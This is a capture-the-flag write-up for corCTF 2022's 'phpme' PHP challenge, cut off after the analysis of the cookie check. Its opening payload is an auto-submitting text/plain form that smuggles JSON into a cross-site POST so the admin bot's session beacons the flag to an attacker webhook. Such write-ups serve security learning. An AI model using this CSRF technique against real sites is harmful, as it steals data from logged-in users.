corctf 2022 - phpme

Challenge description:

"This is what normal PHP CTF challenges look like, right?" - A web dev who barely knows PHP https://phpme.be.ax **https://adminbot.be.ax/phpme**

TL;DR

<body onload="document.frm.submit()">
 <form name="frm" enctype='text/plain' action="<https://phpme.be.ax/>" method="post">
   <input name='{"yep": "yep yep yep", "url": "webhook", "trash": "' value='"}'>
   <input type="submit" value="Submit">
 </form>
</body>

When visiting https://phpme.be.ax, you'll be greeted with some php code:

<?php
    include "secret.php";

    // <https://stackoverflow.com/a/6041773>
    function isJSON($string) {
        json_decode($string);
        return json_last_error() === JSON_ERROR_NONE;
    }

    if ($_SERVER['REQUEST_METHOD'] === 'POST') {
        if(isset($_COOKIE['secret']) && $_COOKIE['secret'] === $secret) {
            // <https://stackoverflow.com/a/7084677>
            $body = file_get_contents('php://input');
            if(isJSON($body) && is_object(json_decode($body))) {
                $json = json_decode($body, true);
                if(isset($json["yep"]) && $json["yep"] === "yep yep yep" && isset($json["url"])) {
                    echo "<script>\\n";
                    echo "    let url = '" . htmlspecialchars($json["url"]) . "';\\n";
                    echo "    navigator.sendBeacon(url, '" . htmlspecialchars($flag) . "');\\n";
                    echo "</script>\\n";
                }
                else {
                    echo "nope :)";
                }
            }
            else {
                echo "not json bro";
            }
        }
        else {
            echo "ur not admin!!!";
        }
    }
    else {
        show_source(__FILE__);
    }
?>

At https://adminbot.be.ax/phpme, you can submit a url for the admin to visit.

Analyzing the PHP code

At the start of the page, we see that it includes a file called secret.php, which will hide the secret variables from us: $secret and $flag.

The interesting part is where those variables are used:

 if ($_SERVER['REQUEST_METHOD'] === 'POST') {
        if(isset($_COOKIE['secret']) && $_COOKIE['secret'] === $secret) {
            // <https://stackoverflow.com/a/7084677>
            $body = file_get_contents('php://input');
            if(isJSON($body) && is_object(json_decode($body))) {
                $json = json_decode($body, true);
                if(isset($json["yep"]) && $json["yep"] === "yep yep yep" && isset($json["url"])) {
                    echo "<script>\\n";
                    echo "    let url = '" . htmlspecialchars($json["url"]) . "';\\n";
                    echo "    navigator.sendBeacon(url, '" . htmlspecialchars($flag) . "');\\n";
                    echo "</script>\\n";
                }
                else {
                    echo "nope :)";
                }
            }
            else {
                echo "not json bro";
            }
        }
        else {
            echo "ur not admin!!!";
        }
    }

We first have two if-statements that check if we made a POST request and if we have the secret cookie stored in $secret.

Let's start with a simple POST request with curl.

curl -X POST [<https://phpme.be.ax/>](<https://phpme.be.ax/>)

We get back the message "ur not admin!!!", because we don't know the secret cookie to get past the cookie check.